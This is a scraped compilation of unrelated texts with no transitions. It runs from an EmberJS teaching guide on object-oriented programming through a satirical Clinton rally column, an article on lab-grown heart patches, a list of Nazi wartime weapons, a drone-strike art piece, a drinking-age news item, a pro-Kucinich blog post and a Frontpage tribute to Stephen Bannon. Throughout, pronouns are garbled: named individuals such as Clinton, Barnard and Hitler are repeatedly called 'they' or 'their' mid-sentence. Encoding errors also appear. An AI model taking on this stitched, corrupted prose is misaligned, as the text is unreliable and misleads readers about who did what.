Many popular languages you may go on to learn after Javascript are object-oriented languages. This means that they emphasize code reusability by organizing code around abstract concepts (like 'person', or 'blog post'). As you write more complex applications with lots of moving parts, it makes more sense to group code under general 'building-blocks' (objects) like these. Without giving structure your code somehow, it can quickly become unmanageable. The more complicated the interface you build, the more complicated the dependencies between different moving parts.
Javascript is an object-oriented language, but we haven't really had a need to explore the implications of this in depth yet. jQuery has taken care of most of the heavy lifting on the front-end, and the Javascript you've had to write for CouchDB is limited to a few view functions, update handlers and so on.
In order to introduce learners to object-oriented programming (which can be a difficult concept), we're going to rely on a front-end Javascript framework to give us some real-world context.
Why a framework?
We're using a framework for the same reason we learned Bootstrap: it helps us achieve meaningful results quickly by embracing magic (for a more detailed rationale, check out the note on pedagogy from Day 2).
There are other reasons to learn a framework as well: web development languages (Javascript, PHP, Python, Ruby, etc.) use frameworks to simplify things, by reducing the amount of boilerplate, repetitive code that you'll need to write. Frameworks take care of lots of basic configuration, so you don't need to reinvent the wheel. Learning a Javascript framework will give you a 'frame' (sorry) of reference for what you'll encounter down the road. Incidentally, there's a partial list of popular frameworks used by different languages back on Day 1.
Frameworks are also, in a way, inevitable. The most experienced a programmer you become, the more good habits you develop, to save time and automate as many repetitive tasks as you can. Ultimately, you'll either invent your own framework and tools (which requires lots of time and mastery), or you'll start using the ones developed by your peers. It's a simple, logical progression.
There are lots of strong opinions among Javascript developers about which front-end framework is the best one to use. After plenty of deliberation, I've decided to go with EmberJS as our front-end framework. Ember is a mature MVC (model-view-controller) framework for client-side development. What this means is that Ember forces you to organize your code in a way that defines information (model), interfaces (view) and application logic (controller) separately (believe me, it's really easy to mix the three of them up, which makes it much harder to change anything later). Programmers who follow MVC end up with very flexible, maintainable code. This is why so many application frameworks are designed to encourage it.
Why Ember?
Front-end Javascript frameworks are a dime a dozen. There's Meteor, Angular, Ember, Backbone, Sencha / ExtJS, Knockout & React, and a smattering of other lesser-known frameworks that all claim to do more-or-less the same thing. I chose Ember for the following reasons:
It gets you quick results with minimal effort.
Ember has so much automation built into it that a basic application can be developed with very little actual code. The framework makes intelligent guesses about the things you've left out, and if you follow the default path, a great deal of the work is done for you. This is in line with our mantra: getting results is more important than understanding how. Embrace magic.
It's all about URLs.
One of the big reasons I endorsed CouchDB was because of its emphasis on HTTP and REST. I believe it's extremely important for web developers to understand these concepts, and URLs are at the core of both. Ember was built with URLs at its centre, so every state of your application can be represented by a unique URL. In fact, the first thing you do when building an application is defining all these URLs, which is a great exercise to help you map out your project.
This focus on URLs reinforces the importance of REST (Representational State Transfer) in web development, and makes Ember that much more closely aligned with the various server-side frameworks (Rails, Django, CodeIgniter, etc.) you might encounter in the future.
It introduces object-oriented concepts clearly.
Ember, for better or for worse, redefines certain data types that are built-in to Javascript in order to enhance their behaviour. As a result, each time you create a new object, you're extending an aspect of the framework. By doing this again and again, you become familiar with the concept of inheritance (making a specific thing by customizing a more general thing). It also demonstrates polymorphism (see Mixins), encapsulation (or 'data hiding'), and abstraction (simple code that hides more complicated code).
These four concepts are the fundamental building blocks of object oriented programming, that you'll encounter in C++, Java, PHP, and pretty much all the well-known contemporary languages. Ember provides a framework that helps demonstrate and explain these concepts while building cool stuff quickly.
Important note: NEVER use the terms 'inheritance', 'polymorphism', 'encapsulation' or 'abstraction' with students. You'll scare them off, and they don't need to know about them explicitly. Let them do their thing, and get comfortable applying these concepts without knowing that they are. It'll be our little secret.
It's forward-thinking.
Ember's core team has prolific open-source developers with a diverse range of experience behind them. This experience is reflected in the decisions they are making today, and the direction that Ember is headed. As the web continues to evolve, it's important to know that your framework is being steered by people who are actively involved in this evolution. Like CouchDB, Ember is skating to where the puck will be.
Unit overview
The goal of this unit of study is to introduce learners to more advanced programming techniques, using an object-oriented approach and an MVC framework. At this point, students should know how to build a front-end interface and link it to a database using AJAX. This is a pretty good skill-set for basic websites and web applications, but it quickly becomes unmanageable when you want to build something more complex. The more "states" your application can have, the more carefully you need to plan so that the right controls are available at the right time. Once students come up against these limitations, it's time to graduate to a framework.
To find a hook into this unit, consider finding some samples of really polished web applications, and speculate about how they might have been built. What would the database fields have to look like for each kind of item? How do the buttons respond when clicked? How does everything happen so quickly, without reloading the page? When do AJAX calls happen? As you ask these questions, you'll help students articulate and define the limitations of what they can currently build.
Now, show them how to overcome these limitations.
A beginner's exercise to introduce some basic features of Ember would be to create a simple, three-page website. Nothing special, no forms or database interactions yet. Just a simple, static website with 3 links to different sections. Have students model this website using Ember's approach: define the application, define the 3 routes, the application template, and the 3 corresponding page templates.
Students should immediately begin to see one of Ember's value propositions: instead of creating 3 HTML files and linking them all together by copying and pasting a navigation bar, they can write the entire website on a single page, and rely on Ember to respond to clicks, load new content instantly, and even change the URL. They may also notice that they only needed to write the navigation bar once, in the application template. As the page contents change with each new section, the navigation bar stays the same, and the page never needs to refresh.
For an intermediate exercise , students might try and re-create one of their previous web applications from Day 2, but using the Ember framework to reduce the amount of code they need to write. This will reveal the areas where they still need to grow, like action handlers, Handlebars templates, model hooks and state management. Students may need to remain at this stage for a while, and it's a good opportunity for group-work, as many students will find that they're trying to solve similar problems. That's okay - there should always be time for collaboration and exchanging ideas. Vygotsky might even call these opportunities zones of proximal development.
Finally, as an advanced exercise , challenge students to create an Ember application that can list items from a database, display those items individually, and edit & save them back to the database. This will require learners to define nested routes (e.g. /posts , /post/hello , /post/hello/edit), initiate a model with data from a database (using AJAX inside Ember controllers), and create interface templates that can trigger actions when buttons are clicked.
Where to go from here?
Like CouchDB and pretty much every other technology we've covered, Ember is a rabbit hole unto itself. You could spend months on this one topic and still learn how to do new things, and it's entirely up to you how in-depth you care to go. However, the bare minimum that students should learn before moving on to Day 5 is how to create an Ember application that can fetch data from a database, display it, edit it, and save it back to the database. If they've mastered the skills required to meet this outcome, they have an excellent foundation in front-end development, databases, and object-oriented programming.
Congratulations, your students are now highly employable. But, there's still plenty more to learn about programming. We'll catch a glimpse of this tomorrow.
Recommended reading and resources
Stop breaking the web
This video features one of the EmberJS founders, Tom Dale, speaking about what the is trying to accomplish. It provides some great insights into the project's values and priorities, and highlights many of the framework's strengths.
Emberwatch
Emberwatch is an excellent collection of resources, from screencasts and tutorials to full-fledged example code complete with annotations. They also have a Twitter account.
A step-by-step guide to building your first EmberJS app
A good introduction for intermediate programmers. This tutorial, along with some other screencasts, tutorials, articles and example code, will help learners understand how to structure their Ember projects.
Ember Guides
The official guides on the Ember website, which start by taking you through building an example To-Do application. Consider assigning this tutorial to students to follow along. The Ember website also has a great introductory video screencast for newcomers, featuring Tom Dale (again).
Ember and the future of the web
Brandon Hays expands on some of the reasons behind why I've selected Ember for this course of study. They make some excellent, insightful observations about client side frameworks versus server-side frameworks. They also explain how the Ember team is skating to where the puck will be.
Warming Up With Ember (Codeschool)
While the entire course isn't free, students can try out the first part of this course without paying. Codeschool courses feature great screencasts and interactive practical assignments that give very good feedback.
Up next:
Voters listen to Hillary Clinton during at a rally in Cedar Rapids, Iowa, on Saturday. (Melina Mara/The Washington Post)
CEDAR RAPIDS, Iowa — How do you get people excited about The Sensible Option? What do you chant? “APPROPRIATE FOOTWEAR!” “YEAAAAAH METAMUCIL!” “WE'RE GOING TO BED AT A REASONABLE HOUR!” “WE ARE HYDRATING!” “WE HAVE RESPONSIBILITIES!” “WE'RE ADULTSSSSSS!”
Adulthood is a hard sell.
When you're a child you think becoming an adult means getting to have daily ice cream for breakfast. But you actually become an adult the moment you realize it doesn't. And, as Hillary Clinton has been learning, that realization doesn't make for a fun rally theme.
Leave aside everything you know about Hillary Clinton. This is, I realize, a great deal. In a strange sense, they have achieved the feminist dream of being judged not as a woman first but as a person first; even though she's a potentially historic female candidate, we know so much about them that it is almost impossible for them to be a Symbol not a Person.
Leave this aside for a moment and consider the pitch they are making.
At their rallies across Iowa, Bill and Hillary Clinton are trying an odd one-two punch where they explain that they are a mature adult who can get things done. They have worked across the aisle! They can make things happen!
She's a “sticker,” whatever that word means.
Then Hillary Clinton gets onstage and announces that the Republican candidates are all hideous ravening beasts who will tear everything down. She, on the contrary, will NOT tear it down. They will build on it IN AN INCREMENTAL FASHION, working hard WITHIN THE SYSTEM!
Do you begin to see the difficulty of selling this?
The excitement gap is like the thigh gap: Maybe it would stop being a thing if we decided not to talk about it so much? But it's easy to see why it would exist.
Here are a few highlights from the lineup for Saturday night's Bernie Sanders rally, held simultaneously: Foster the People. Josh Hutcherson. Vampire Weekend.
Here are a few highlights from the Clinton rally: Bill Clinton. Chelsea Clinton. Hillary Clinton.
Here is Scott McNabb, a guest columnist in the Gazette (East Iowa's Independent, Locally Owned Newspaper), describing Hillary Clinton: “has the ability to graciously receive heartfelt messages from middle-aged women who seem to identify deeply with her.” Talk about damning with oddly specific praise.
I know that there are millennials who are genuinely fired up for Hillary Clinton, but they have yet to make much of a dent in the campaign's general vibe, which is very much Book Club (Bring Your Own Wine) or Child's Ice Hockey Game.
Go to a Bernie Sanders rally, and there are six bands and a team of comedians and the place is overflowing with college students with vibrantly colored hair. Go to a Clinton rally, and there are their mothers, trying but failing to groove to a playlist that seems to be designed for Moms Who Want To Sit In The Tub After A Hard Day And Drink Wine. The crowd looks like an open call for an Activia digestive yogurt commercial. There is one person standing and cheering wildly, and everyone else is attempting to make it clear that they are not with them
The chanting is limited. It's hard to get a good chant going when your pitch is LET'S WORK WITHIN THE SYSTEM TO MAKE INCREMENTAL CHANGES! What do you shout? “Gradual Change!” “Hey It's Better Than Nothing!” “Hey Hey! Ho Ho! These Things Don't Happen Overnight, You Know!” “Baby steps!”
“Burn it down!” is easy. “Take A Systematic Approach To Build On Prior Successes In A Small But Meaningful Way, Working With Congress” is not.
This is not a movement. This is whatever the opposite of a movement is. A settlement? If you are supposed to campaign in poetry and govern in prose, this campaign missed that memo.
The question becomes: Do you need to be a movement to win?
It isn't that Hillary Clinton is incapable of getting fired up, or of getting people fired up. At Saturday night's rally, they showed real passion on the subject of gun control. Most candidates who stand on one side or the other of the Second Amendment will say something like “AND WE WILL STOP GUN VIOLENCE” or “AND WE WILL MAKE SURE OUR VETERANS RETAIN THEIR RIGHT TO BEAR ARMS!” and the crowd cheers and it is left at that. But when Hillary Clinton talks about gun control, they start to wade into the specifics of “smart” guns and the potential for decreasing accidents and — where in this do you cheer?
There's a second problem, which is that the Old Machines are all not working. Bernie Sanders and President Obama before them both feel like “found” candidates, spread by word-of-mouth and excitement across social media. You had the hipster illusion of having discovered this Cool New Territory yourself.
Hillary Clinton, by contrast, is McDonald's. There's no discovery involved.  They are what the machine is trying to hand you. She's Top 40.  They are your mom coming home and asking “Have you heard this great song ‘Happy'?”
It makes sense that Lena Dunham has been campaigning for her: They are both products of the System announcing to you what you are going to like before you've quite made up your mind, and it instantly produces a backlash. These days, we value the people we feel like we found ourselves, who rose organically to the top on a stream of word-of-mouth: the YouTube stars, not the studio stars; the Vine stars, the “American Idol” winners, the Internet writers, the ones we feel like we got to choose and discover on our own. We like to feel included and directly connected. We like to meme our stars, use them as a canvas, Shepard Fairey style.
And this is not how the Clintons roll, to put it mildly.
Hillary Clinton is not your new bicycle.  They are not your blank canvas. They are, if anything, too detailed.
And she's leaning into that. If you want hopey-changey stuff, they are not your girl. But how do you get excited, then? “I AM WHAT YOU CHOOSE WHEN HOPE HAS GIVEN WAY TO THE COLD HARSH LIGHT OF REALITY AND YOU JUST WANT SOMEONE TO GOVERN” doesn't exactly make a good chant.
In the early hours of 3 December 1967, Prof Christiaan Barnard gazed down into the void and felt a chill ripple through their veins as they considered the historic nature of what they were about to attempt. The gaping chasm lying before them was the empty chest cavity of a 54-year-old former boxer called Louis Washkansky. Barnard had just removed Washkansky's heart, a bloated organ left ravaged and scarred by repeated coronary attacks, and now they had just minutes to try to save their lives by inserting a heart taken from Denise Darvall, a 25-year-old woman left brain dead after being struck by a car that day.
At the time, cardiac transplant surgery was barely a decade old, pioneered by a handful of individuals who had developed a radical method of switching a heart from one body to another – but all previous transplants had been done in dogs. As they worked to stitch the new organ into Washkansky's body and then shock it into life, Barnard and their team were improvising, guided only by a few dozen animal studies, the suggestions of scientific papers and their own instinct. But at 6.13am, after almost four hours of surgery, Washkansky's transplanted heart started to stir. As Barnard would write: “Little by little it began to roll with the lovely rhythm of life.”
It would prove to be a defining moment in the history of medical science. While Washkansky themselves would die of pneumonia just 18 days later, their body weakened by intensive antirejection treatment, their case paved the way for hundreds of heart transplants in the following years. Now, 50 years on from Barnard's achievement, 4,000 heart transplants are performed around the world each year. But while some patients live for decades, complications persist due to the need for constant immunosuppressant treatment, meaning the survival rate after 12 years is still just 50%. In addition, while studies in the US have found that more than 20,000 Americans could benefit from a heart transplant each year, just 2,000 transplants are performed there due to a shortage of donors.
But many scientists believe we are on the verge of a new medical revolution. Advances in regenerative medicine will allow us to repair damaged hearts instead of replacing them. In all mammals, it's almost impossible for a damaged heart to repair itself. Within minutes of being deprived of oxygen due to a blocked artery, the heart's muscle cells start to die. If surgeons are able to tackle the blockage within one hour, the damage can be reversed. If 12 hours have passed, up to 1bn heart cells may already be lost, replaced only by tough, rigid scar tissue.
“The problem is that the regenerative power of the heart is lower than other organs,” says Dr Tim Henry, director of cardiology at the Cedars-Sinai Medical Center in Los Angeles. “If you lose half your liver, it will grow back. Your skin heals completely very quickly. But for people whose heart failure isn't treated in time, or who have already had one heart attack, there's permanent, significant damage which leaves them requiring a transplant.”
Over the past 15 years, scientists have experimented with taking stem cells from the blood or bone marrow and injecting them into badly damaged hearts. This typically works well in improving blood flow to the heart, helping patients who have bad blockages in their arteries. But despite numerous attempts, these individual stem cells have been unable to grow back much of the lost heart muscle. The body's immune responses are so hostile to new cells implanted into the heart that even when the patient's own tissue is used, 90% of the cells still die.
“The stem cell approach has shown some benefit, but it's been relatively short-lived,” says Prof Richard Farndale of the University of Cambridge. “What generally happens is that the stem cells fail to attach to the heart and are lost into the bloodstream fairly quickly.”
However, a new approach appears to hold a lot more promise. Scientists are growing “heart patches”, tiny beating pieces of heart muscle, in small dishes in the lab. They are made by taking a drop of blood from a patient and engineering the blood cells into a layer of fully formed cardiac tissue. This is genetically matched to that person, and can be engrafted into the heart to replace damaged areas. This has been tested in mice and will soon be tested in pigs. In the next five years, scientists hope to launch a clinical trial to apply the patches in humans. At a cost of about £70,000 a patient, it promises to be a far more economically viable alternative to heart transplants, which, with the huge surgical teams required, cost the NHS up to £500,000.
“The hope is that by providing a patch of tissue which already beats and contracts, instead of just individual cells, the body's built-in programming will take over and assimilate it into the heart as if it was already there,” says Tim Kamp, professor of regenerative biology, who builds heart patches at the University of Wisconsin.
One of the challenges in coming years is to ensure that the new patch electrically integrates with the heart so that both beat in synchrony. Scientists hope that because the patch will be so similar to the existing heart muscle, natural bodily processes will take over.
“We anticipate this will happen, but we have to make sure and be really cautious,” Kamp says. “The heart isn't a USB socket which we can just plug things into. For patients with severe heart failure, the whole heart dilates to try to adapt to the damage. It changes shape from being like a football to a big basketball. But we hope these patches will be able to heal a much larger area of damage than single cell injections. And if multiple patches are required to replace multiple areas of scarring, we can put those in. This technology may really provide a whole avenue of hope for people with these conditions who badly need new treatments.”
Imagine if the Nazis had bombed New York City the same way they bombed London. Imagine if they had a fleet of aircraft carriers rivaling, at least, Japan's fleet. Imagine if they fielded a jet fighter in large numbers well before D-Day. Imagine that they had guided missiles, an assault rifle like the AK-47 and (gulp) “the bomb.”
Well, you don't have to imagine, because Nazi Germany developed many weapons systems and programs that could — COULD — have been game changers had they been completed, completed sooner, or fielded in large numbers. These 10 weapons listed below show just how close-run WWII was. Fortunately, the weapons were never fully developed, built in small numbers or deployed too late to seriously affect the course of the war. Nazi politics, strategic materials shortages, the Allied bombing campaign, production problems and even boneheaded interference from Hitler themselves fortunately relegated these systems to mere idle speculation, instead of the tools that won the war for the Nazis. But it boggles the mind to imagine what might have happened if Hitler didn't go to war in 1939, but waited several more years.
10 “The bomb”
It's a matter of minor debate concerning how far along the Germans were in developing an atomic bomb before Allied bombers wiped out the efforts for good. But make no mistake, they were trying to build one. Could you imagine Hitler having atomic bombs? America, of course, developed the atomic bomb first—to be used initially against Germany. This is number 10 rather than number one because everything else on this list actually existed, either as prototypes or as operational weapons.
9 The Focke Achgelis Fa 223 helicopter
[youtube=http://www.youtube.com/watch?v=w0flSwzjnMA&hl=en&fs=1]
The “Dragon” helicopter was invented some time before the war, but the Germans were the first ones to actually put a whirlybird into production. The Fa-223 was the latest in Focke's helicopter designs and was a good aircraft. And, for once, interference from Nazi bigwigs actually only played a minor part in production and deployment. Twenty examples were built by the winter of 1942-43 when Allied bombers plastered the only factory making them. Attempts to resume production failed, and resources were directed to more critical systems. But imagine if the Nazis had succeeded in deploying such an aircraft in large numbers before the war turned against them. The clip is from Military Channel's Top Ten Helicopters. Fascinating fact: When German paratroopers rescued Mussolini in 1943, they were supposed to go in using a Fa 223. But the helicopter developed engine trouble, and the troopers used gliders instead.
8 He-100 fighter
[youtube=http://www.youtube.com/watch?v=1cGC47uHwZk&hl=en&fs=1]
In March 1939, Luftwaffe pilot Hans Dieterle achieved an absolute average speed record of 463.9 mph, the last such speed record set before the war. Their aircraft was the Heinkel He-100V8, a fighter prototype. Although possessing excellent flight characteristics (speed, dive, maneuverability, range, etc.) the He-100 never entered production. Nazi officials decided to stick with the Messerschmitt BF-109 as its primary fighter and ordered Heinkel to focus on making bombers. Aviation enthusiasts and historians disagree as to why the He-100 died: Was it politics, poor decisions by Heinkel, production problems or something else? The He-100 prototypes were retired or sold to other nations, especially Japan, whose decent mid-war Kawasaki Ki-61 fighter—the only non-radial fighter Japan fielded—was based on the He-100. Why could this have been a game-changer? Because had the Nazis and Heinkel gone ahead with production of this fighter, which was supposedly superior to even the hot Focke Wulf FW-190 introduced later in the war, events such as the Battle of Britain could have turned out much differently. The He-100, for example, had much greater range than the 109 and was far superior to the Me-110, and could have easily fended off British fighters trying to get at German bombers. Note: The clip appears to be a Japanese film of Dieterle's record flight.
7 Type XXI U-boat
The U-boats (submarines) used in World War II were superior in every way to their WWI counterparts, and the Type XXI vessel outclassed every other submarine of every navy. The Type XXI, dubbed the Elektoboote, was the first operational submarine designed to run totally submerged for extended periods—meaning, far longer than the submerged operational viability of the Type VIIC, the most numerous U-boat type. The Elektroboote could stalk Allied ships with far more impunity than earlier models thanks to its greatly improved batteries and “stealth” modifications that made it difficult to detect by Allied sonar. The type's weapons systems were superior, including hydraulically-loaded torpedoes and torpedoes aimed by sonar, which eliminated the need to raise the U-boat to periscope depth for attack. Between 1943 and 1945, German shipyards built 118 Type XXI boats. But only four were combat-ready by the time the Germans surrendered, and only one ever went on patrol. Boneheaded production decisions, including those by Albert Speer, and Allied bombing prevented this deadly boat from ever becoming a menace.
6 Strategic bombers
[youtube=http://www.youtube.com/watch?v=jOjvZXSok4g&hl=en&fs=1]
After its successful debut in the Spanish Civil War, the Luftwaffe set on a strategy of using only tactical bombers (light, medium and dive bombers), eschewing the four-engine heavy bombers being developed in England and America. This concentration on highly vulnerable and lightly armed bombers meant that the Luftwaffe never had a true strategic heavy bomber. Although in possession of some four- and six-engine planes at war's start, none was truly suitable for strategic bombing. Luftwaffe attempts to finally build long-range city-killers were either disasters or abandoned. The Heinkel He-177, the only Luftwaffe strategic bomber to enter into production, was a disastrous failure. It was a flawed four-engine design featuring two engines mounted in tandem on each wing, which frequently cased fires. Hitler also demanded that massive plane be capable of dive-bombing, which was totally wacky, and contributed to its serious problems. Along the same lines was the “New York bomber” program, which featured two aircraft, the Junkers Ju-290 and the Messerschmitt Me-264, with designs to bomb New York City. But the program never went beyond the prototype stage. The few models of the decent Ju-290 were used not as bombers but long-range couriers between Nazi Germany and Imperial Japan late in the war. Meanwhile, one complete Me-264, which curiously looked like the American B-29 Super Fortress, was completed and another two were under construction when the “New York bomber” program was abandoned permanently. The clip, which doesn't have sound, is of a J-290.
5 Heinkel He-219 “Owl” night fighter
[youtube=http://www.youtube.com/watch?v=4FLEnG07pXE&hl=en&fs=1]
This superb, purpose-built, 2-engine night fighter was the best Axis night fighter of the war, and one of the finest piston aircraft made prior to the jet age. Just one He-219 downed 25 Allied bombers in a matter of *days* during the prototype period; the plane was that good. While possessing excellent flight characteristics, formidable weaponry and radar guidance, the plane was somewhat complex to build. Heinkel only built a few hundred, partially because they were ordered to concentrate on bombers. Instead, the Luftwaffe relied on modifying existing aircraft, namely Me-110s and Junkers Ju-88s. In far larger numbers, the He-219 could have brought nighttime RAF bombing operations to a close. The clip, which doesn't have sound, appears to be of a captured He-219 with USA markings.
4 Graf Zeppelin aircraft carrier
The Kriegsmarine (German navy) never had an aircraft carrier during WWII, but it came close. In 1935, Hitler deemed that the Kriegsmarine would build aircraft carriers. At this point in naval history, the battleship was still the primary naval vessel, and aircraft carriers something of a novelty; therefore, naval treaties concentrated on limiting battleship tonnage. In 1937, shipbuilders laid the keel for the 33,500-tonne Graf Zeppelin and launched them the next year. However, they were never completed. Herman Goering thought that the carrier would intrude on the duties of their Luftwaffe, and Admiral Karl Doenitz championed U-Boats over surface vessels. Such territorial fights and the increasing shortage of war materials led to their abandonment at 80% completion. The Soviets captured the Graf Zeppelin in 1945, but it wasn't learned until 2006 that the Soviets used them for target practice and sank them in 1947.
3 V-2 and other guided weapons
[youtube=http://www.youtube.com/watch?v=WjFTN-YdK_M&hl=en&fs=1]
Germany employed many radio-controlled weapons during the latter half of the war, including the V-1 Buzz bomb, a slow, primitive cruise missile that was easy to shoot down. Radio-controlled air-to-surface missiles, such as the Henschel Hs 293 guided bomb, were a hassle for Allied shipping until techs found ways to jam the signals. Of all the German radio-controlled weapons, the V-2 ballistic missile was the most successful. However, the Nazis used the V-2 primarily to terrorize London, Antwerp and elsewhere during the last full year of the war. Much more powerful and faster than the V-1 “buzz bomb,” the Hs-293 and the “Mistel” (an old bomber packed with explosives literally flown by remote to a target), the V-2 was quite difficult to shoot down and packed a powerful explosive punch. One wonders what could have happened if the Germans had used such weapons exclusively against Allied troops instead of civilians. Considering that by summer 1944 the Allies had near total air domination in the west and the Soviets were closing hard from the east, such a weapon could have proven costly to the Allies—and cheaper than sending in fighters and bombers. With a mobile launch platform and a high-speed flight, the V-2 could — COULD — have gone a long way to negating Allied air power. But almost all of the 10,000 V-2s launched directly targeted civilians.
2 Sturmgewehr StG-44 assault rifle
[youtube=http://www.youtube.com/watch?v=PMw4n4n-TKg&hl=en&fs=1]
Germany fielded many powerful weapons systems for the Wehrmacht, including the fearsome Tiger and Panther tanks and the 88-mm cannon. (My wife's late grandpa had many stories about being fired on by those %#[email protected]! 88s.) The Wehrmacht's small arms inventory was good, though a little unwieldy. The basic German soldier went to war equipped with the Karabiner Kar98, an old but powerful and reliable bolt-action rifle with a 5-shot cartridge. (The Kar98 is still in use!) Elite German troops, such as the paratroopers, as well as the SS and Gestapo, were often equipped with the MP-40 or 41 machine pistols / submachine gun. German armories, however, created a very powerful and versatile submachine gun *almost* akin to the famed postwar Soviet AK-47. In trained hands, the StG-44 could lay down a devastating hail of 7.92mm bullets (the same as used by the Kar98), and provided the power of the Kar98 and up-close versatility of the MP-40. During the last year-and-a-half of the war, they proved their effectiveness, so much so that when Hitler asked their generals in July 1944 what they needed, one of them exclaimed, “More of these rifles!” However, the StG-44 came too late in the war to have any appreciable effect. East German police units used them as late as the early 1960s. The clip is from Military channel's Top Ten Combat Rifles.
1 Messerschmitt Me-262 “Swallow”
The Me-262 was the world's first operational jet fighter. Despite frequent engine problems, the Me-262 was a fast and deadly aircraft, and outpaced almost all Allied fighters (only the P-51D Mustang could match it.) It could have gone operational in the fall of 1943, when the war was still pretty much in the balance. At that time, the Luftwaffe still had not lost most of its veteran pilots and Allied escort fighters could not penetrate too far into the Reich. The Me-262 could have swept Allied bombers and fighters from the sky, giving Germany critical air dominance once more. Fortunately for the world, Hitler themselves demanded that the new fighter aircraft be modified for dive-bombing use — a purpose for which it was not designed. This meddling delayed construction and deployment for more than a year. By the time the Me-262 took to the skies operationally in late 1944, it was far too late. The clip shows a restored Me-262 at a 2006 air show in Berlin.
Follow us on Facebook or subscribe to our daily or weekly newsletter so you don't miss out on our latest lists.
L.A. artist [Jonathan Fletcher Moore] sent us this fantastic tech-art piece on dehumanization and drone warfare. Talking too much about art is best left to the artists, so we'll shut up and let you watch the video below the break.
The piece is essentially a bunch of old cap guns with servos that pull their triggers. A Raspberry Pi with an Internet connection fetches data on US drone strikes from www.dronestre.am and fires off a cap every time someone is killed. At the same time, the story version of the data is printed out in thermal paper that cascades onto the floor.
Viewers are encouraged to sit underneath all the cap guns and wait. Talk about creepy and suspenseful. And a tiny reflection of the everyday fears that people who live under drone-filled skies.
Bu t alongside a powerful statement, technical craftsmanship matters when you're making art. Painting everything white makes it visually uniform, sterile, and a little bit spooky.
And we'll admit that we think that nicely laced cabling just looks sexy. (We've taken other random opportunities to pimp it before, but go have a look at NASA's guidelines (PDF) on the matter.)
OK, this project / art piece is far too refined for the term “hack”, but as [Jonathan] says himself:
MONTPELIER (VERMONT): Many states across the US are toying with the idea of lowering the drinking age to allow 18- to 20-year-olds to legally buy alcohol under some circumstances.
In Vermont country, two decades after a uniform drinking age of 21 was established, a nascent movement is afoot to allow 18- to 20-year-olds to legally buy alcohol.
Proponents say the higher age hasn���t kept young people from consuming alcohol and has instead driven underage consumption underground.
"Our laws aren���t working. They���re not preventing underage drinking. What they���re doing is putting it outside the public eye," Vermont state senator Hinda Miller said.
"So you have a lot of kids binge drinking. They get sick, they get scared and they get into trouble and they can���t call because they know it���s illegal."
Organisations and lawmakers in other states are also toying with similar ideas.
In South Dakota, a lawyer has drafted a petition to allow 19- and 20-year-olds to legally buy beer no stronger than 3.2% alcohol.
In Missouri, a group is using internet social networking sites to collect more than 100,000 signatures to get a measure on the ballot to lower the drinking age to 18.
And last year, former Middlebury College president John McCardell started Choose Responsibility, a nonprofit that favours allowing 18- to 20-year-olds to legally buy booze once they���ve completed an alcohol education programme.
The debate over a lower drinking age has also reached the capitol. Rep Tom Rukavina, Virginia, is helping sponsor legislation that would lower the drinking age in bars, to 18.
February 10, 2008 | Filed Under Elections
President Bush has committed a number of acts as president that could be listed as reasons for impeachment. The Iraq War is the biggest issue that has plagued their administration and one that he'll take to their grave. President Bush and Vice President Cheney have heard the chants, they are aware of the noise. By now, you'd expect that the Democratic party would do something about the illegal war or the war crimes that have arisen under President Bush's watch. Now, instead of fighting the injustice, we've decided that it is OK to look the other way on justice because doing otherwise would allow the terrorists to win.
From Dissident Voice : “Is Dennis Kucinich being McKinney'd?”
There is a report circulating the web that before the Nevada primary Kucinich was visited by representatives of Nancy Pelosi and the American Israel Public Affairs Committee, the right wing Israeli lobby. They told them that if they would drop their campaigns to impeach Cheney and Bush, they would guarantee their re-election to the House of Representatives. Kucinich threw them out of their office. Kucinich has aggressively challenged the Democratic Party leadership in Congress and on the presidential campaign trail on the issues of war, civil liberties, impeachment and big business control of government. He's even refused to pledge to endorse the party's presidential nominee.
Dennis Kucinich is an American hero in my book. It's not their politics or their agenda that has me fired up, it's their will to fight and resist the power of men in charge who are up to no good. Kucinich is brave for fighting this fight against corporatism and fascism that we've allowed to creep into our government. The problem he'll face moving forward is a big one. Millions of dollars are going into the campaign of their opposition, he's being outspent 5 to 1 and their voice seems to have no place in our government. Instead of taking bribes and ‘deals' to let the issue go, he's stood up for principle and the American people and I hope that they are an inspiration to more government officials as this fight goes forward.
We can't allow this country to be guided by the hands of evil, it already is in very bad shape. If you have the time, visit their website and donate or do whatever you can so that they aren't ousted from their position in Congress.
UPDATE:
Someone at Afterdowningstreet spoke directly with Congressman Dennis Kucinich over the rumor noted above.
“Before the Nevada primary, Dennis was visited by representatives of Nancy Pelosi and the American Israel Public Affairs Committee — AIPAC. They told Dennis that if they would drop their campaigns to impeach Cheney and Bush, they would guarantee their re-election to the House of Representatives. Kucinich threw them out of their office.” According to Kucinich, “The incident did not happen.”
The commentary still stands, as this piece is about Dennis Kucinich's threat to the President and the opposition that seeks to derail their reelection campaign.
Visit Sponsor: the White House Intel Report or Subscribe to the White House Intel Report
Comments
David Horowitz and Matthew Vadum pay tribute to Frontpage Magazine's 2016 Man of the Year: Stephen K. Bannon, former Breitbart News Executive Chairman and current chief strategist to President-elect Donald Trump.
From Frontpage Magazine:
TIME magazine named Donald Trump “Person of the Year” for 2016, and we could have done the same. But this would have been to over-simplify a victory that millions of Americans believe has brought this nation back from the brink of destruction, and has done so against what seemed impossible odds. In the just completed election campaign, a vicious partisan press substituted character assassination for reporting and joined malicious Democrats in demonizing Trump and their supporters as racists, sexists, Islamophobes, xenophobes and religious bigots, while dismissing the candidate as “unfit to sit in the White House.”
From the outset Trump distinguished themselves as a self-confident warrior who refused to be “politically correct.” Trump won the primaries and eventually the election because, unlike Republicans before him, they refused to be intimidated by leftist witch-hunters and their reputation-burning attacks.
But Trump's very fearlessness, self-confidence and disregard for progressive bigotry – their indisputable strengths – came with a downside that threatened to undo him. Even as they responded to the defamation from whatever quarter it came, their campaign message was pushed into the background until it was in danger of being altogether lost. Questions began to be raised and not only by opponents. Could Trump be presidential? Could they stick to a winning message? Lackluster polling numbers sparked a panic among feckless Republicans who began demanding that Trump be replaced as the nominee. Even in the camp of the faithful, supporters began to wonder if their candidate was too thin-skinned and undisciplined to win, and – equally important – whether such a strong-willed individual could listen to a voice that was not their own. Could they ever trust and then avail themselves of a counselor, who would focus their message and keep them on course?
The answer came within four months of the election when Trump, then trailing in the polls, shook up their team and made Stephen K. Bannon the CEO of their campaign.
Read the rest here at Frongpage.
Students at Elizabethtown College this month is wearing white pins in the shape of puzzle pieces to remind them of their white privilege.
The campaign was launched over the weekend by the Elizabethtown College Democrats, who say it aims to make students at the small and private liberal arts college in Pennsylvania more introspective about issues of race, especially in their predominantly white region of Lancaster County.
